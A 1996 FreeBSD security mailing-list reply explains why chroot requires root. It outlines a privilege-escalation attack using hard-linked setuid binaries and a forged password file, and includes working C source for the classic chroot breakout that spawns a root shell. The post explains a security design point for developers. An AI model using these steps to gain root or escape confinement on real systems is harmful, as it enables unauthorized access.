From owner-freebsd-security Mon Sep 9 14:09:18 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA19351 for security-outgoing; Mon, 9 Sep 1996 14:09:18 -0700 (PDT) Received: from freebsd.gaffaneys.com (dialup6.gaffaneys.com [134.129.252.25]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA19344 for ; Mon, 9 Sep 1996 14:09:11 -0700 (PDT) Received: (from zach@localhost) by freebsd.gaffaneys.com (8.7.5/8.7.3) id QAA04873; Mon, 9 Sep 1996 16:09:47 -0500 (CDT) Message-Id: <199609092109.QAA04873@freebsd.gaffaneys.com> Subject: Re: Question about chroot In-Reply-To: from Richard Wackerbarth at "Sep 9, 96 01:26:21 pm" To: rkw@dataplex.net (Richard Wackerbarth) Date: Mon, 9 Sep 1996 16:09:46 -0500 (CDT) From: Zach Heilig Cc: freebsd-security@freebsd.org Reply-to: Zach Heilig X-Mailer: ELM [version 2.4ME+ PL24 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In a previous message, Richard Wackerbarth wrote: >In looking at some of the "make" problems, I ran up against a >characteristic of "chroot" that puzzles me. >In order to chroot, you must be root. Why? Basically, all you have to do to become root in a chroot() environment is to hard-link the appropriate setuid executables into a publicly writable directory (usually /usr/tmp), and build your own minimal filesystem to use while in that environment. You need the /etc/master.passwd file (you create it yourself), /etc/group (to put yourself in the wheel group), /usr/sbin/vipw (to rebuild the other passwd files), /usr/bin/su (to gain root), /bin/sh, and any other file utilities that you find you need in the course of the attack (probably hard links to each of the lib*.so.* libraries, and ld/ldd). You should probably put the binaries in /bin (relative to the chroot() root directory). Breaking out of the chroot() environment after you become root is trivial. I have source here that works for FreeBSD: #include #include int main(void) { int i; mkdir("break-out", 0755); chroot("./break-out"); chdir("."); for (i = 0; i < 30; ++i) chdir(".."); chroot("."); execl("/bin/sh", "sh" , (char *) 0); puts("exec failed!"); return 1; } You compile this before calling chroot for /usr/tmp/wherever. At this point, the attacker would clean up his mess in /usr/tmp, and possibly put a setuid shell in an accessible spot. >It appears to me than the only thing that chroot does is to restrict the >"visable" tree. It does not ADD anything that is not already there. But the user can BEFORE running chroot. >If that is the case, why wouldn't it be good enough for chroot to be suid >root and allow any user to execute it? >Am I overlooking some security hole? Yes. This is one reason it is bad to have a world-writable directory on the same filesystem as the /usr filesystem. -- Zach Heilig (zach@blizzard.gaffaneys.com) | ALL unsolicited commercial email Support bacteria -- it's the | is unwelcome. I avoid dealing only culture some people have! | with companies that email ads.